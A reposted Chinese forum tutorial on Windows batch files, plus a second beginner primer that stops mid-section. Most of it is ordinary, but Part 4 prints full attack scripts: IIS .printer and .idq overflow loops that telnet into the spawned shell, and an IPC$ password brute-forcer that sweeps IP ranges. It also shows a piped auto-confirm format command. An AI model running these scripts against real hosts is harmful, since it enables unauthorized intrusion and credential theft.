批处理

30 views

Skip to first unread message

comp...@gmail.com

unread,

Jan 2, 2006, 6:50:54 AM1/2/06

to cfans--技巧,优化,有趣

此文章是转载过来的，别说我不教你们批处理，文章都在这，靠自己学的，我也是慢慢摸索出来了，也只懂了个基本。不懂的地方大家一起研究研究！！

小引：
最近好多猜测弱口令的病毒在网上流行，比如前段时间闹得很厉害的Worm.Dvldr
蠕虫就是一个典型。这些病毒有个共同点就是利用批处理来进行ipc$连接，从而来猜测管理员的口令达到控制服务器的目的。病毒由几个文件和几个复杂的批处理组成。批处理算不上真正意义上的编程，但是它的一些思想和编程比较近似。通过在网上和一些初学的朋友交流，发现他们对于批处理很感兴趣，多多少少了解一些命令的用法，但缺乏比较系统的了解，所以特意写下这篇教程，好让感兴趣的朋友对批处理有个整体的认识，并能通过该教程举一反三，写出自己的批处理。
该教程一共分为4大部分，第一部分是批处理的专用命令，第二部分是特殊的符号与批处理，第三部分是批处理与变量，第四部分是完整案例。因为教程比较长，所有在杂志上我们将分为两次连载，本期首先刊登一、二两部分，敬请读者注意。

第一部分：批处理的专用命令

批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件，其扩展名为BAT。这些命令统称批处理命令，下面我就来给大家介绍一下批处理的命令。
1、 REM
REM
是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例：
REM
你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM
会放在REM后面。请大家注意。

2、 ECHO
ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO
message来显示一个特定的消息。例：
Echo off
Rem 以上代表关闭回显即不显示所执行的命令
Echo 这个就是消息。
Rem 以上代表显示“这就是消息”这列字符
执行结果：
C:\>ECHO.BAT
这个就是消息。

3、 GOTO
GOTO
即为跳转的意思。在批处理中允许以“：XXX”来构建一个标号然后用GOTO
：标号直接来执行标号后的命令。例
:LABEL
REM 上面就是名为LABEL的标号。
DIR C:\
DIR D:\
GOTO LABEL
REM 以上程序跳转标号LABEL处继续执行。

4、CALL
CALL
命令可以在批处理执行过程中调用另一个批处理，当另一个批处理执行完后再继续执行原来的批处理。例：
批处理2.BAT内容如下：
ECHO 这就是2的内容
批处理1.BAT内容如下：
ECHO 这是1的内容
CALL 2.BAT
ECHO 1和2的内容全部显示完成
执行结果如下：
C:\>1.BAT
这是1的内容
这就是2的内容
1和2的内容全部显示完成

5、PAUSE
PAUSE 停止系统命令的执行并显示下面的内容。例：
C:\> PAUSE
请按任意键继续 . . .

6、 IF
IF 条件判断语句，语法格式如下：
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
说明：
[NOT] 将返回的结果取反值即“如果没有”的意思。
ERRORLEVEL 是命令执行完成后返回的退出值
Number
退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。
string1==string2
string1和string2都为字符的数据，英文字符的大小写将看做不同，这个条件中的等于号必须是2个（绝对相等），条件想等后即执行后面的
command
EXIST filename 为文件或目录存在的意思。
IF
ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF
ERRORLEVEL来判断命令的返回值。
例：
1、 IF [NOT] ERRORLEVEL number command
检测命令执行完后的返回值做出判断。
echo off
dir z:
rem 如果退出代码为1（不成功）就跳至标题1处执行
IF ERRORLEVEL 1 goto 1
rem 如果退出代码为0（成功）就跳至标题0处执行
IF ERRORLEVEL 0 goto 0
:0
echo 命令执行成功！
Rem 程序执行完毕跳至标题exit处退出
goto exit
:1
echo 命令执行失败！
Rem 程序执行完毕跳至标题exit处退出
goto exit
:exit
Rem 这里是程序的出口
2、 IF string1==string2 command
检测当前变量的值做出判断
ECHO OFF
IF %1==2 goto no
Echo 变量相等！
Goto exit
:no
echo 变量不相等
goto exit
:exit
大家可以这样看效果 C:\>test.bat 数字

3、 IF [NOT] EXIST filename command
发现特定的文件做出判断
echo off
IF not EXIST autoexec.bat goto 1
echo 文件存在成功！
goto exit
:1
echo 文件不存在失败！
goto exit
:exit
这个批处理大家可以放在c盘和d盘分别执行看看效果。
7、 FOR
FOR这个命令比较特殊是一个循环执行命令的命令，同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环。在批处理中FOR的命令如下：
FOR [%%c] IN (set) DO [command] [arguments]
在命令行中命令如下：
FOR [%c] IN (set) DO [command] [arguments]
常用参数：
/L
该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5)
将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。
/D
如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。

/F 从指定的文件中读取数据作为变量
eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx -
指分隔符集。这个替换了空格和跳格键的默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的
for
本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过
nth 符号指定
mth。如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。
usebackq -
指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在
filenameset中使用双引号扩起文件名称。
下面来看一个例子：
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j
%k
会分析 myfile.txt
中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给
for 程序体；用逗号和/或空格定界符号。请注意，这个
for 程序体的语句引用 %i 来取得第二个符号，引用 %j
来取得第三个符号，引用
%k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用
usebackq
选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。
%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens=
选项专门得到说明的。您可以通过 tokens=
一行指定最多 26
个符号，只要不试图说明一个高于字母 'z' 或'Z'
的变量。请记住，FOR
变量名分大小写，是通用的；而且，同时不能有 52
个以上都在使用中。
您还可以在相邻字符串上使用 FOR /F
分析逻辑；方法是，用单引号将括号之间的 filenameset
括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用
FOR /F 命令来分析命令的输出。方法是，将括号之间的
filenameset
变成一个反括字符串。该字符串会被当作命令行，传递到一个子
CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
会枚举当前环境中的环境变量名称。
以下列举一个简单的例子，他将说明参数/L和没有参数的区别：
删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT
例：
ECHO OFF
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
或
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
以上2条命令执行的结果都是一样的如下：
C:\>DEL 1.TXT
C:\>DEL 2.TXT
C:\>DEL 3.TXT
C:\>DEL 4.TXT
C:\>DEL 5.TXT

8、 SETLOCAL
开始批处理文件中环境改动的本地化操作。在执行
SETLOCAL 之后
所做的环境改动只限于批处理文件。要还原原先的设置，必须执
行 ENDLOCAL。
达到批处理文件结尾时，对于该批处理文件的每个
尚未执行的 SETLOCAL 命令，都会有一个隐含的 ENDLOCAL 被
执行。例：
@ECHO OFF
SET PATH /*察看环境变量PATH
PAUSE
SETLOCAL
SET PATH=E:\TOOLS /*重新设置环境变量PATH
SET PATH
PAUSE
ENDLOCAL
SET PATH
从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:\TOOLS后显示为E:\TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。

9、 SHIFT
SHIFT命令可以让在命令上的的命令使用超过10个（%0~%9）以上的可替代参数例：
ECHO OFF
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
执行结果如下：
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
以上就是基于WIN2000下的9个批处理命令。

[此贴子已经被作者于2005-6-30 20:29:24编辑过]

--------------------------------------------------------------------------------
找志刚,请点击!
只会用行动表达语言，不会用语言示意行动！绝对支持盗版！

2005-06-30 20:27 编辑帖子操作

举报帖子
复制贴子
加为精华
单贴屏蔽
帖子评价
使用道具
志刚
QQ 短信好友资料搜索邮件主页引用回复 No: 2

头衔：锦圆★网吧管理员
等级：管理员
文章：1377
积分：9015
注册：2005-05-19
第二部分：特殊的符号与批处理

在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。
1、符号(@)
@在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo
off可以关掉整个批处理的命令回显但却不能不显示echo
off这个命令。现在我们在这个命令前加上@这样echo
off这一命令就被@关闭了回显从而达到所有命令均不回显得要求
2、符号(>)
>的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围（后面可是文件也可是默认的系统控制台）例：
文件1.txt的文件内容为：
1+1
使用命令c:\>dir *.txt >1.txt
这时候1.txt的内容如下
驱动器 C 中的卷没有标签。
卷的序列号是 301A-1508
C:\ 的目录
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 个文件 18,630,070 字节
0 个目录 1,191,542,784 可用字节
>将命令执行的结果覆盖了原始的文件内容。
在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo
off关掉的回显不是同一概念。Echo
off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例：
C:\>dir *.txt >nul
程序将没有任何显示也不会产生任何痕迹。
3、符号(>>)
符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例：
文件1.txt内同为：
1+1
使用命令c:\>dir *.txt >>1.txt
这时候1.txt的内容如下
1+1
驱动器 C 中的卷没有标签。
卷的序列号是 301A-1508
C:\ 的目录
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 个文件 18,630,070 字节
0 个目录 1,191,542,784 可用字节
>>将命令执行的结果覆加在了原始的文件内容后面。
4、符号(|)
|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例：
C:\>dir c:\|find "1508"
卷的序列号是 301A-1508
以上命令的意思为查找c:\的所有并发现1508字符串。Find的用法请用
find /?自行查看
在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的
echo y|fornat a: /s /q /v:system
用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo
y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎）
5、符号(^)
^ 是对特殊符号 > 、<、
&、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例：
c:\>echo test ^> 1.txt
test > 1.txt
从上面可以看出并没有把test写入文件1.txt而是将test
>1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。
6、符号(&)
&符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例：
c:\> dir z:\ &dir y:\ &dir c:\
以上的命令将会连续显示z: y:
c:盘内的内容不理会该盘符是否存在。
7、符号(&&)
&&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例：
c:\> dir z:\ &&dir y:\ &&dir c:\
以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令
8、符号(" ")
"
"符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:
c:\>cd “Program Files”
c:\>cd progra~1
c:\>cd pro*
以上方法都可以进入Program Files目录
9、符号（,）
,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例：
c:\>dir,c:\
10、符号(;)
;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例：
DIR C:\;D:\;E:\F:\
以上的命令相当于
DIR C:\
DIR D:\
DIR E:\
DIR F:\
当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

第三部分：批处理与变量

在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下：
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT.BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例：
批处理内容为：
ECHO %1
ECHO %2
ECHO %3
输入命令：
C:\>TEST “Program Files” Program Files
Program Files
Program
Files
在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如
SET A=%1 这样我们就命名了一个新的环境变量A
在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下：
ECHO OFF
SET PASS=%1
SHIFT
SET PASS1=%1
SHIFT
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %PASS% %PASS1% %9
SET PASS=%PASS1% 变量的传递
SET PASS1=%9
SHIFT
ECHO %PASS% %PASS1% %9
使用命令：C:\>TEST A B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量
A B L 在使用了3次SHIFT之后%9变成了L
B L 变量的传递后的结果

第四部分：完整案例

以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理，看看他们是怎么运作的。这里我将列举三个例子来详细分析，为了保持程序的完整我的注释会加在/*后面。
例一
这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为：
iis5hack <目标ip> <目标端口> <目标版本>
<溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为
<iis.bat 目标ip
（开始版本号）>开始版本号可有可无。程序如下。
@echo off /*关闭命令回显
if "%1%"=="" goto help /*判断%1是否为空，%1为目标ip
if "%2%"=="1" goto 1
/*判断%2是否为1，为1则跳转标志1
if "%2%"=="2" goto 2
/*%2为开始版本号，如果没有设置则
if "%2%"=="3" goto 3
/*如果存在则从匹配的地方开始执行
if "%2%"=="4" goto 4
if "%2%"=="5" goto 5
if "%2%"=="6" goto 6
if "%2%"=="7" goto 7
if "%2%"=="8" goto 8
if not EXIST iis5hack.exe goto file
/*没有发现iis5hack.exe就执行标志file段内容
ping %1 -n 1 | find "Received = 1"
/*ping目标1次，从结果中发现Received = 1
if errorlevel 1 goto error
/*如果返回代码为1则执行error段(代码1为没有发现
0为发现并成功执行)
iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80
系统代码9 溢出后连接端口88
在执行结果中发现字符串”good”(溢出成功后才会有字符串good)
if not errorlevel 1 goto telnet
/*如果没有错误代码1（溢出成功）就执行telnet段的内容。
echo 操作系统类型 9 失败! /否则显示这一句
:8 /*以下代码内容参照上面
iis5hack %1 80 8 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 8 失败!
:7
iis5hack %1 80 7 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 7 失败!
:6
iis5hack %1 80 6 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 6 失败!
:5
iis5hack %1 80 5 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 5 失败!
:4
iis5hack %1 80 4 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 4 失败!
:3
iis5hack %1 80 3 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 3 失败!
:2
iis5hack %1 80 2 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 2 失败!
:1
iis5hack %1 80 1 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 1 失败!
:0
iis5hack %1 80 0 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 0 失败!
goto error
:telnet
telnet %1 88 /*开始连接目标ip的88端口
goto exit /*连接中断后跳转exit段
:error /*error段显示错误后的帮助信息
echo
可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!
echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]
ECHO 中文: 0
ECHO 中文+sp1: 1
ECHO 英文: 2
ECHO 英文+sp1: 3
ECHO 日语: 4
ECHO 日语+sp1: 5
ECHO 韩文: 6
ECHO 韩文+sp1: 7
ECHO 墨西哥语: 8
ECHO 墨西哥语+sp1: 9
goto exit /*跳转exit段
:file /*file段显示文件没有发现的信息
echo 文件iis5hack.exe没有发现!程序终止运行!
goto exit /*跳转exit段
:help /*help段显示本批处理的使用格式帮助
echo 本程序用法如下:
echo iis [目标ip]
echo iis [目标ip] [开始的号码9-0]
:exit /*exit段为程序出口
这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大！
例二
这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下：
运行参数: 操作系统类型目的地址 web端口 1
溢出监听端口 <输入命令1>

其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。
其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为
<idq.bat 目标ip>程序如下：
@echo off /*同例一
if not EXIST iisidq.exe goto file /*同例一
if %1 == "" goto error /*同例一
ping %1 -n 1 | find "Received = 1" /*同例一
if errorlevel 1 goto error1 /*同例一
set b=%1
/*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip
set a=0
/*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。
:no /*no段开始
if %a%==0 set d=0
/*如果环境变量a=0则创建环境变量d设定环境变量d=0。
if %a%==1 set d=1
/*环境变量d其实是操作系统类型代码，用计数器来控制其
if %a%==2 set d=2 /*变动。
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0 /*变量传递完成后转到标志0处运行
:1
echo
正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......
:0 /*标志0开始
IISIDQ %d% %b% 80 1 99 |find "good"
/*按格式发送溢出命令并在结果中发现字符串good（发送代码成功才会有字符串good）
if errorlevel 1 goto 1
/*如果没有good字符串则没有发送成跳
/*转标志1处继续尝试发送
ping 127.0.0.1 -n 8 >nul
/*ping自己8次相当于延时8秒不显示执
/*行结果
echo 正在执行第%d%项!
/*报告正在溢出的操作系统类型
telnet %b% 99 /*连接溢出端口
echo. /*显示一个空行
if %d%==14 goto error1
/*如果操作系统类型为14则跳转error1处（循环出口）
if %d%==13 set a=11
/*开始用计数器对操作系统代码重新附值
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no /*附值完成跳转no段执行
:file /*以下都是出错后的帮助提示
echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!
goto exit
:error
echo 错误!目标ip不可识别!请使用下面的格式连接!
echo idq [目标IP]
goto exit
:error1
echo
连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!
echo 请按照下面的格式手工尝试!
echo iisidq [目标类型] [目标IP] [目标端口] [连接方式]
[溢出端口]
echo telnet [目标ip] [溢出端口]
:exit /*整个程序的出口
这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。
例三
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in
(1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use
\\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为：C:\>TEST.BAT
218
当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令
(这里我把上面的值都带进去，设密码为123 用户名为
abc)
net usr \\218.0.0.1\ipc$ 123 /u:abc
当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。我把这个例子做了些修改（完整文件见光盘ipc.bat）由兴趣的朋友可以自己看看。修改后的程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强，至于能加强到什么地步能不能成为一个新的工具那就是你的事了。
这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了，大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要说简单哦！最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了！！简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长！

后记：
批处理的语法其实很简单，但需要灵活的运用。希望这篇教程能让大家以后都熟练的使用批处理，一些基本的问题可以*自己的能力去解决。这样我的目的也就达到了！！哈哈！大家快乐才是真的快乐。

comp...@gmail.com

unread,

Jan 9, 2006, 2:48:21 AM1/9/06

to cfans--技巧,优化,有趣

绍

扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。

首先批处理文件是一个文本文件，这个文件的每一行都是一条DOS命令（大部分时候就好象我们在DOS提示符下执行的命令行一样），你可以使用DOS下的Edit或者Windows的记事本(notepad)等任何文本文件编辑工具创建和修改批处理文件。

其次，批处理文件是一种简单的程序，可以通过条件语句(if)和流程控制语句(goto)来控制命令运行的流程，在批处理中也可以使用循环语句(for)来循环执行一条命令。当然，批处理文件的编程能力与C语言等编程语句比起来是十分有限的，也是十分不规范的。批处理的程序语句就是一条条的DOS命令（包括内部命令和外部命令），而批处理的能力主要取决于你所使用的命令。

第三，每个编写好的批处理文件都相当于一个DOS的外部命令，你可以把它所在的目录放到你的DOS搜索路径(path)中来使得它可以在任意位置运行。一个良好的习惯是在硬盘上建立一个bat或者batch目录（例如C:\BATCH），然后将所有你编写的批处理文件放到该目录中，这样只要在path中设置上c:\batch，你就可以在任意位置运行所有你编写的批处理程序。

第四，在DOS和W.x/Me系统下，C:盘根目录下的AUTOEXEC.BAT批处理文件是自动运行批处理文件，每次系统启动时会自动运行该文件，你可以将系统每次启动时都要运行的命令放入该文件中，例如设置搜索路径，调入鼠标驱动和磁盘缓存，设置系统环境变量等。下面是一个运行于Windows
98下的autoexec.bat的示例：
@ECHO OFF
PATH
C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;C:\SYSTOOLS;C:\WINTOOLS;C:\BATCH
LH SMARTDRV.EXE /X
LH DOSKEY.COM /INSERT
LH CTMOUSE.EXE
SET TEMP=D:\TEMP
SET TMP=D:\TEMP

批处理的作用
简单的说，批处理的作用就是自动的连续执行多条命令。

这里先讲一个最简单的应用：在启动wps软件时，每次都必须执行（>前面内容表示DOS提示符）：

C:\>cd wps
C:\WPS>spdos
C:\WPS>py
C:\WPS>wbx
C:\WPS>wps
如果每次用WPS之前都这样执行一遍，您是不是觉得很麻烦呢？

好了，用批处理，就可以实现将这些麻烦的操作简单化，首先我们编写一个runwps.bat批处理文件，内容如下：
@echo off
c:
cd\wps
spdos
py
wbx
wps
cd
以后，我们每次进入wps，只需要运行runwps这个批处理文件即可。

常用命令

echo、@、call、pause、rem(小技巧：用::代替rem)是批处理文件最常用的几个命令，我们就从他们开始学起。

echo 表示显示此命令后的字符
echo off
表示在此语句后所有运行的命令都不显示命令行本身
@与echo
off相象，但它是加在每个命令行的最前面，表示运行时不显示这一行的命令行（只能影响当前行）。

call
调用另一个批处理文件（如果不用call而直接调用别的批处理文件，那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令）。

pause 运行此句会暂停批处理的执行并在屏幕上显示Press
any key to continue...的提示，等待用户按任意键后继续
rem
表示此命令后的字符为解释行（注释），不执行，只是给自己今后参考用的（相当于程序中的注释）。

例1：用edit编辑a.bat文件，输入下列内容后存盘为c:\a.bat，执行该批处理文件后可实现：将根目录中所有文件写入
a.txt中，启动UCDOS，进入WPS等功能。

　　批处理文件的内容为: 　　　　　　　
命令注释：

　　　　@echo
off　　　　　　　　　　　不显示后续命令行及当前命令行
　　　　dir c:\*.*
>a.txt　　　　　　　将c盘文件列表写入a.txt
　　　　call c:\ucdos\ucdos.bat　　　　调用ucdos
　　　　echo 你好　　　　　　　　　　显示"你好"
　　　　pause 　　　　　　　　　　　　
暂停,等待按键继续
　　　　rem 准备运行wps 　　　　　　　
注释：准备运行wps
　　　　cd ucdos　　　　　　　　　　　进入ucdos目录

　　　　wps 　　　　　　　　　　　　　运行wps　　

批处理文件的参数

批处理文件还可以像C语言的函数一样使用参数（相当于DOS命令的命令行参数），这需要用到一个参数表示符“%”。

%[1-9]表示参数，参数是指在运行批处理文件时在文件名后加的以空格（或者Tab）分隔的字符串。变量可以从%0到%9，%0表示批处理命令本身，其它参数字符串用%1到%9顺序表示。

例2：C:根目录下有一批处理文件名为f.bat，内容为：
@echo off
format %1
如果执行C:\>f a:
那么在执行f.bat时，%1就表示a:，这样format
%1就相当于format
a:，于是上面的命令运行时实际执行的是format a:

例3：C:根目录下一批处理文件名为t.bat，内容为:
@echo off
type %1
type %2

那么运行C:\>t a.txt b.txt
%1 : 表示a.txt
%2 : 表示b.txt
于是上面的命令将顺序地显示a.txt和b.txt文件的内容。

特殊命令

if goto choice
for是批处理文件中比较高级的命令，如果这几个你用得很熟练，你就是批处理文件的专家啦。

一、if
是条件语句，用来判断是否符合规定的条件，从而决定执行不同的命令。
有三种格式:

1、if [not] "参数" == "字符串" 待执行的命令

参数如果等于(not表示不等，下同)指定的字符串，则条件成立，运行命令，否则运行下一句。

例：if "%1"=="a" format a:

2、if [not] exist [路径\]文件名待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。

如: if exist c:\config.sys type c:\config.sys
表示如果存在c:\config.sys文件，则显示它的内容。

3、if errorlevel <数字> 待执行的命令

很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态)，通过if
errorlevel命令可以判断程序的返回值，根据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值等于指定的数字，则条件成立，运行命令，否则运行下一句。

如if errorlevel 2 goto x2

二、goto
批处理文件运行到这里将跳到goto所指定的标号(标号即label，标号用:后跟标准字符串来定义)处，goto语句一般与if配合使用，根据不同的条件来执行不同的命令组。

如:
goto end

:end
echo this is the end

标号用“:字符串”来定义，标号所在行不被执行。

三、choice
使用此命令可以让用户输入一个字符（用于选择），从而根据用户的选择返回不同的errorlevel，然后于if
errorlevel配合，根据用户的选择运行不同的命令。

注意：choice命令为DOS或者Windows系统提供的外部命令，不同版本的choice命令语法会稍有不同，请用choice
/?查看用法。

choice的命令语法（该语法为Windows
2003中choice命令的语法，其它版本的choice的命令语法与此大同小异）：

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

描述:

该工具允许用户从选择列表选择一个项目并返回所选项目的索引。

参数列表:
/C choices 指定要创建的选项列表。默认列表是
"YN"。

/N
在提示符中隐藏选项列表。提示前面的消息得到显示，
选项依旧处于启用状态。

/CS
允许选择分大小写的选项。在默认情况下，这个工具
是不分大小写的。

/T timeout
做出默认选择之前，暂停的秒数。可接受的值是从 0
到 .9。如果指定了
0，就不会有暂停，默认选项
会得到选择。

/D choice 在 nnnn
秒之后指定默认选项。字符必须在用 /C 选
项指定的一组选择中; 同时，必须用 /T 指定
nnnn。

/M text
指定提示之前要显示的消息。如果没有指定，工具只
显示提示。

/? 显示帮助消息。

注意:
ERRORLEVEL
环境变量被设置为从选择集选择的键索引。列出的第一个选
择返回 1，第二个选择返回
2，等等。如果用户按的键不是有效的选择，

该工具会发出警告响声。如果该工具检测到错误状态，它会返回
255 的
ERRORLEVEL 值。如果用户按 Ctrl+Break 或 Ctrl+C
键，该工具会返回 0
的 ERRORLEVEL 值。在一个批程序中使用 ERRORLEVEL
参数时，将参数降
序排列。

示例:
CHOICE /?
CHOICE /C YNC /M "确认请按 Y，否请按 N，或者取消请按
C。"
CHOICE /T 10 /C ync /CS /D y
CHOICE /C ab /M "选项 1 请选择 a，选项 2 请选择 b。"
CHOICE /C ab /N /M "选项 1 请选择 a，选项 2 请选择 b。"

如果我运行命令：CHOICE /C YNC /M "确认请按 Y，否请按
N，或者取消请按 C。"
屏幕上会显示：
